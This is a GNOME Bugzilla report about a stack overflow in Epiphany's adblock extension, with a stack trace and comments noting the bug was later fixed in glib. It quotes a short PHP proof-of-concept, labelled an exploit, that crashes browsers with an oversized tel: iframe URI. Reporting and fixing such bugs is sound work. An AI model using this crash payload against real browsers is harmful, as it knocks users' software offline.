After an evaluation, GNOME has moved from Bugzilla to GitLab. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore.
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.
Bug 595255 - Stack overflow in adblock's uri matcher
Stack overflow in adblock's uri matcher
Status: RESOLVED OBSOLETE
Product: epiphany-extensions
Classification: Deprecated
Component: adblock
2.27.x
Other Linux
: Normal critical
: ---
Assigned To: epiphany-extensions-maint
epiphany-extensions-maint
Depends on:
Blocks:
 
 
Reported: 2009-09-15 11:22 UTC by Priit Laes (IRC: plaes)
Modified: 2011-04-16 13:13 UTC
See Also:
GNOME target: ---
GNOME version: ---


Description Priit Laes (IRC: plaes) 2009-09-15 11:22:00 UTC 
Following code causes stack overflow in adblock extension:

[snip]
# Apple Safari Iphone Crash using tel:
# Found by cloud : cloud[at]madpowah[dot]org
# http://blog.madpowah.org

# Tested on Iphone 3G, OS 3.0.1
# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear

# Exploit:

<?php
set_time_limit(0);
$var = "";
for ($i=0; $i<100000; $i++){
       $var = $var . "A";
}
echo '<iframe src="tel:' . $var .'"></iframe>';
?> 
[/snip]
Comment 1 Priit Laes (IRC: plaes) 2009-09-15 11:22:35 UTC 
Stack trace:

+ Trace 217586

  • #0 match
    at pcre_exec.c line 625
  • #1 match
    at pcre_exec.c line 4092
  • #2 match
    at pcre_exec.c line 716
  • #3 match
    at pcre_exec.c line 1186
  • #4 pcre_exec
    at pcre_exec.c line 4845
  • #5 IA__g_match_info_next
    at gregex.c line 514
  • #6 IA__g_regex_match_full
    at gregex.c line 1459
  • #7 IA__g_regex_match
    at gregex.c line 1370
  • #8 match_uri
    at ad-uri-tester.c line 102
  • #9 IA__g_hash_table_find
    at ghash.c line 1255
  • #10 ad_uri_tester_test_uri
    at ad-uri-tester.c line 165
  • #11 ephy_adblock_impl_should_load
    at ephy-adblock-extension.c line 189
  • #12 resource_request_starting_cb
    at ephy-embed.c line 213
  • #13 IA__g_closure_invoke
    at gclosure.c line 767
  • #14 signal_emit_unlocked_R
    at gsignal.c line 3247
  • #15 IA__g_signal_emit_valist
    at gsignal.c line 2980
  • #16 IA__g_signal_emit_by_name
    at gsignal.c line 3074
  • #17 WebKit::FrameLoaderClient::dispatchWillSendRequest
    at WebKit/gtk/WebCoreSupport/FrameLoaderClientGtk.cpp line 201
  • #18 WebCore::FrameLoader::dispatchWillSendRequest
    at WebCore/loader/FrameLoader.cpp line 5204
  • #19 WebCore::ResourceLoader::willSendRequest
    at WebCore/loader/ResourceLoader.cpp line 209 






Comment 2


Pacho Ramos





          2010-10-29 20:05:18 UTC
        



Any news on this?






Comment 3


Guillaume Ayoub





          2011-04-16 12:15:45 UTC
        



Cannot reproduce with Epiphany 3.0 + Adblock. Seems to be fixed.

Original article with proof of concept:
http://blog.madpowah.org/archives/2009/09/index.html#e2009-09-13T22_22_31.txt






Comment 4


Priit Laes (IRC: plaes)





          2011-04-16 13:13:55 UTC
        



(In reply to comment #3)
> Cannot reproduce with Epiphany 3.0 + Adblock. Seems to be fixed.
> 
> Original article with proof of concept:
> http://blog.madpowah.org/archives/2009/09/index.html#e2009-09-13T22_22_31.txt

Thanks, seems to be fixed meanwhile within glib.